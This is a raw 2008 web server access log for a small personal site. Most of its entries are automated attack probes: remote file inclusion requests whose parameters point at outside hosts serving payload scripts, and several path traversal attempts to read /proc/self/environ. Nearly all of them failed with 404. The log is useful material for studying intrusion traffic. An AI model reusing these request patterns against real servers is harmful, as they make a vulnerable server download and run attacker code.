123.214.171.33 - - [03/Nov/2008:09:04:26 -0600] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
123.214.171.33 - - [03/Nov/2008:09:04:27 -0600] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
123.214.171.33 - - [03/Nov/2008:09:04:39 -0600] "GET /logs/access_log.1214179200//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
69.64.78.34 - - [03/Nov/2008:09:04:58 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
69.64.78.34 - - [03/Nov/2008:09:05:04 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
83.149.69.97 - - [03/Nov/2008:09:06:54 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:09:06:54 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
203.83.219.27 - - [03/Nov/2008:09:08:47 -0600] "GET /modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.812"
140.130.101.5 - - [03/Nov/2008:09:08:57 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:09:08:57 -0600] "GET /logs/access_log.1215907200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:09:08:57 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:09:08:57 -0600] "GET /logs/access_log.1219536000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
213.203.223.59 - - [03/Nov/2008:09:09:27 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.203.223.59 - - [03/Nov/2008:09:09:27 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
213.203.223.59 - - [03/Nov/2008:09:09:33 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.203.223.59 - - [03/Nov/2008:09:09:33 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
38.99.44.104 - - [03/Nov/2008:09:10:40 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.203.223.59 - - [03/Nov/2008:09:11:32 -0600] "GET /logs/browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.203.223.59 - - [03/Nov/2008:09:11:33 -0600] "GET /browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.203.223.59 - - [03/Nov/2008:09:11:42 -0600] "GET /logs/browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.203.223.59 - - [03/Nov/2008:09:11:43 -0600] "GET /browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
83.149.69.97 - - [03/Nov/2008:09:13:37 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:09:13:37 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
88.84.157.127 - - [03/Nov/2008:09:14:30 -0600] "GET /logs/access_log.1202428800//squirrelcart/cart_content.php?cart_isp_root=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
88.84.157.127 - - [03/Nov/2008:09:14:31 -0600] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
88.84.157.127 - - [03/Nov/2008:09:14:31 -0600] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
88.84.157.127 - - [03/Nov/2008:09:15:01 -0600] "GET /logs/access_log.1208044800//squirrelcart/cart_content.php?cart_isp_root=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
213.89.20.105 - - [03/Nov/2008:09:15:08 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://s.webring.com/go?ring=history;sid=229;id=229;next""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.89.20.105 - - [03/Nov/2008:09:15:08 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.89.20.105 - - [03/Nov/2008:09:15:09 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.89.20.105 - - [03/Nov/2008:09:15:10 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.85.114.130 - - [03/Nov/2008:09:16:12 -0600] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
70.85.114.130 - - [03/Nov/2008:09:16:21 -0600] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
203.146.26.91 - - [03/Nov/2008:09:16:59 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:09:16:59 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
140.130.101.5 - - [03/Nov/2008:09:17:02 -0600] "GET /logs/access_log.1216944000//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
140.130.101.5 - - [03/Nov/2008:09:17:02 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
140.130.101.5 - - [03/Nov/2008:09:17:02 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
88.84.157.127 - - [03/Nov/2008:09:17:04 -0600] "GET /logs/access_log.1208044800%20//squirrelcart/cart_content.php?cart_isp_root=http://www.contactosteune.com/server/iddd.txt%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
140.130.101.5 - - [03/Nov/2008:09:17:15 -0600] "GET /logs/access_log.1214956800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.55.174.114 - - [03/Nov/2008:09:17:33 -0600] "GET /logs/access_log.1206230400/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
72.55.174.114 - - [03/Nov/2008:09:17:34 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
72.55.174.114 - - [03/Nov/2008:09:17:34 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
140.130.101.5 - - [03/Nov/2008:09:17:47 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
140.130.101.5 - - [03/Nov/2008:09:17:47 -0600] "GET /logs/access_log.1216944000//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
140.130.101.5 - - [03/Nov/2008:09:17:47 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
140.130.101.5 - - [03/Nov/2008:09:18:20 -0600] "GET /logs/access_log.1216944000//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:09:18:20 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:09:18:20 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:09:18:37 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
140.130.101.5 - - [03/Nov/2008:09:18:37 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
140.130.101.5 - - [03/Nov/2008:09:18:37 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
203.146.26.91 - - [03/Nov/2008:09:18:40 -0600] "GET /logs//main.php?sayfa=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:09:18:40 -0600] "GET //main.php?sayfa=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
140.130.101.5 - - [03/Nov/2008:09:18:46 -0600] "GET /logs/access_log.1214956800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
203.83.219.27 - - [03/Nov/2008:09:18:48 -0600] "GET /logs/access_log.1214524800/modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 393 "-""libwww-perl/5.812"
203.83.219.27 - - [03/Nov/2008:09:18:48 -0600] "GET /modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.812"
203.83.219.27 - - [03/Nov/2008:09:18:49 -0600] "GET /logs/modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.812"
140.130.101.5 - - [03/Nov/2008:09:18:53 -0600] "GET /logs/access_log.1214956800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
140.130.101.5 - - [03/Nov/2008:09:19:28 -0600] "GET /logs/access_log.1216944000//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
140.130.101.5 - - [03/Nov/2008:09:19:28 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
140.130.101.5 - - [03/Nov/2008:09:19:28 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
140.130.101.5 - - [03/Nov/2008:09:19:51 -0600] "GET /logs/access_log.1214956800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.222.4.51 - - [03/Nov/2008:09:20:34 -0600] "GET /logs/index.php?page=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:09:20:34 -0600] "GET /logs/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:09:20:34 -0600] "GET /index.php?page=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
83.222.4.51 - - [03/Nov/2008:09:20:34 -0600] "GET /index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
203.83.219.27 - - [03/Nov/2008:09:20:58 -0600] "GET /logs/access_log.1214179200/modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 393 "-""libwww-perl/5.812"
140.130.101.5 - - [03/Nov/2008:09:21:11 -0600] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
140.130.101.5 - - [03/Nov/2008:09:21:11 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
140.130.101.5 - - [03/Nov/2008:09:21:11 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
140.130.101.5 - - [03/Nov/2008:09:21:11 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
203.146.26.91 - - [03/Nov/2008:09:21:12 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:09:21:13 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/insos_napawe/temp.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
195.3.194.35 - - [03/Nov/2008:09:21:22 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:09:21:22 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
140.130.101.5 - - [03/Nov/2008:09:21:52 -0600] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:09:21:52 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:09:21:52 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:09:21:52 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
195.3.194.35 - - [03/Nov/2008:09:22:37 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:09:22:37 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.98.178.98 - - [03/Nov/2008:09:23:31 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.63"
66.98.178.98 - - [03/Nov/2008:09:23:31 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.63"
66.98.178.98 - - [03/Nov/2008:09:23:31 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.63"
93.149.197.76 - - [03/Nov/2008:09:23:41 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.it/search?hl=it&client=firefox-a&channel=s&rls=org.mozilla%3Ait%3Aofficial&hs=C1L&q=tattoo+vintage&btnG=Cerca&meta=""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
93.149.197.76 - - [03/Nov/2008:09:23:42 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
93.149.197.76 - - [03/Nov/2008:09:23:42 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
93.149.197.76 - - [03/Nov/2008:09:23:44 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
193.84.183.38 - - [03/Nov/2008:09:23:48 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:09:23:54 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:09:24:18 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
193.84.183.38 - - [03/Nov/2008:09:24:21 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
206.210.111.3 - - [03/Nov/2008:09:26:12 -0600] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://syahrulazlan.com/login/id.txt? HTTP/1.0" 404 315 "-""libwww-perl/5.48"
206.210.111.3 - - [03/Nov/2008:09:26:12 -0600] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://syahrulazlan.com/login/id.txt? HTTP/1.0" 404 310 "-""libwww-perl/5.48"
206.210.111.3 - - [03/Nov/2008:09:26:24 -0600] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://syahrulazlan.com/login/id.txt? HTTP/1.0" 404 315 "-""libwww-perl/5.48"
206.210.111.3 - - [03/Nov/2008:09:26:24 -0600] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://syahrulazlan.com/login/id.txt? HTTP/1.0" 404 310 "-""libwww-perl/5.48"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET /logs//index.php/?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET /logs//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-""XXXXXX"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
193.84.183.38 - - [03/Nov/2008:09:27:28 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET /logs//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""XXXXXX"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET //index.php/?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET //index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-""XXXXXX"
77.232.66.15 - - [03/Nov/2008:09:27:28 -0600] "GET //index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""XXXXXX"
193.84.183.38 - - [03/Nov/2008:09:27:31 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
208.83.106.201 - - [03/Nov/2008:09:27:39 -0600] "GET /logs/access_log.1219622400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:09:27:47 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:09:27:47 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:09:27:50 -0600] "GET /logs/access_log.1216512000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 387 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
